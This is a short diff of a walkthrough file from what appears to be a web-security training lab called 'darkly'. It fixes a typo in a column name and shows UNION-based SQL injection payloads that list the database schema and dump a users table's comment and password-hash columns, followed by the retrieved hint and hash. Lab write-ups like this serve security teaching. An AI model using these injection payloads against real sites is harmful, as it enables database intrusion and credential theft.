TheSecretOrganization/darkly/members/ressources/walktrough.md

 `1 UNION SELECT table_name, column_name FROM information_schema.COLUMNS`.
 We can then observe a definition of a table named `users` wich contains column like `Commentaire` and `countersign`.
-If we query those two values with `1 UNION SELECT Commentaire, contersign FROM users` we can get the values
+If we query those two values with `1 UNION SELECT Commentaire, countersign FROM users` we can get the values
 ```
 First name: Decrypt this password -> then lower all the char.
 Sh256 on it and it's good !
 Surname : 5ff9d0165b4f92b14994e5c685cdce28